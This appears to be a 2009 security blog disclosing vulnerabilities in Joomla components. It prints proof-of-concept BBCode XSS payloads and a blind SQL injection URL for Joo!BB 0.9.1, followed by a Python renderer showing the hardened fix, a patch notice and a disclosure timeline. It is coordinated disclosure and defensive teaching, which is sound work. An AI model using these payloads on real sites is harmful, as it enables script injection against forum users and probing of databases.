Monday, 10 August 2009 15:20

I've been working on a custom Joomla component for a client at work, and needed to validate certain aspects of the admin form. I could have reinvented the wheel and written my own validation routine, but I really wanted to use Joomla's core validation behavior. What follows is how I managed to validate a form when it is submitted using the core Joomla toolbar buttons.

Last Updated on Monday, 10 August 2009 15:41
Monday, 03 August 2009 16:42
As I reported earlier, I was interviewed in the not too distant past concerning XSS security and Joomla. I am proud to say that the interview has been posted on CMSWire, with a prominent back link to yours truly in the first paragraph!
The whole interview can be read here.
Saturday, 01 August 2009 00:00

The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.

  1. Nested [img] XSS

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. Nested [url] XSS

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  3. BBCode [color] Tag Injection

    [color=#ff0000;font-size:100px;]XSS[/color]
  4. BBCode [url] Location XSS

    [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
  5. BBCode [font] Tag Injection

    [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
  6. BBCode [table] Tag XSS

    [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
  7. Blind SQL Injection

    /index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- '
    If MySQL is version 5, this will return results. Otherwise, no results.
These vulnerabilities have been patched and users are strongly urged to update to 0.9.1 Patch 1.
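The common root of items 1 through 6 is a BBCode-to-HTML converter that copies tag arguments and nested tag text into attributes without validating them. The renderer below is an added illustration of the hardened form, written in Python for demonstration and not code from Joo!BB or its patch (the component itself is PHP): it HTML-escapes the input before any tag matching, refuses tag bodies that contain another tag, restricts [url] and [img] targets to http(s) URLs, and allow-lists [color] and [font] values, so each payload above renders as inert text. The blind SQL injection in item 7 is a separate fix (a parameterized query for searchwords) and is not covered here.

```python
import html
import re

# Allow-lists for attribute values: each tag accepts only the grammar it needs,
# so CSS fragments or event handlers can never reach the generated markup.
URL_RE = re.compile(r'^https?://[^\s"\'<>]+$')
HEX_COLOR_RE = re.compile(r'^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$')
FONT_RE = re.compile(r'^[A-Za-z0-9 ,-]{1,64}$')
# Tags that take no attributes: a [td=...] form simply never matches.
PLAIN_TAGS = ('b', 'i', 'table', 'tr', 'td')
# Tag bodies may not contain another '[' or ']', so a nested tag used as an
# attribute payload keeps the outer tag from matching and stays literal text.
INNER = r'([^\[\]]*)'

def _url(value):
    # The text is already HTML-escaped; only validate scheme and shape here.
    value = value.strip()
    return value if URL_RE.match(value) else None

def render_bbcode(text):
    # Escape the whole input first; every substitution below works on escaped
    # text, so no raw quote or angle bracket from the user reaches the output.
    out = html.escape(text, quote=True)

    def img(m):
        u = _url(m.group(1))
        return f'<img src="{u}" alt="">' if u else m.group(1)
    out = re.sub(r'\[img\]' + INNER + r'\[/img\]', img, out)

    def url_attr(m):
        u = _url(m.group(1))
        return f'<a href="{u}">{m.group(2)}</a>' if u else m.group(2)
    out = re.sub(r'\[url=([^\[\]]*)\]' + INNER + r'\[/url\]', url_attr, out)

    def url_plain(m):
        u = _url(m.group(1))
        return f'<a href="{u}">{u}</a>' if u else m.group(1)
    out = re.sub(r'\[url\]' + INNER + r'\[/url\]', url_plain, out)

    def styled(m):
        tag, val, body = m.group(1), m.group(2).strip(), m.group(3)
        check, prop = ((HEX_COLOR_RE, 'color') if tag == 'color'
                       else (FONT_RE, 'font-family'))
        # A value outside the allow-list drops the tag and keeps the body.
        return f'<span style="{prop}:{val}">{body}</span>' if check.match(val) else body
    out = re.sub(r'\[(color|font)=([^\[\]]*)\]' + INNER + r'\[/\1\]', styled, out)

    def plain(m):
        return f'<{m.group(1)}>{m.group(2)}</{m.group(1)}>'
    out = re.sub(r'\[(' + '|'.join(PLAIN_TAGS) + r')\]' + INNER + r'\[/\1\]', plain, out)
    return out
```

Because the escaping happens once, up front, and every attribute is both quoted and validated against a fixed grammar, an attacker controls only the text between tags, never the markup around it.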

Timeline

  • Vulnerabilities Discovered: 26 July 2009
  • Vendor Notified: 27 July 2009
  • Vendor Response: 29 July 2009
  • Update Available: 01 August 2009
  • Disclosure: 01 August 2009
Last Updated on Thursday, 30 September 2010 17:39
Thursday, 16 July 2009 12:04

The Joomla component Agora 3.0.0 RC1 Rev.4 suffers from a persistent XSS vulnerability. It can be exploited by uploading a malicious SWF file as an attachment and then embedding it with the [swf] BBCode tag from the local server, which bypasses any cross-domain policy.

Last Updated on Thursday, 30 September 2010 17:41
Saturday, 11 July 2009 23:37

Well, another XSS-vulnerable BBCode implementation, this time in the JTag Ticketing System. This is the exact same vulnerability I posted about earlier concerning WebAmoeba.


The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
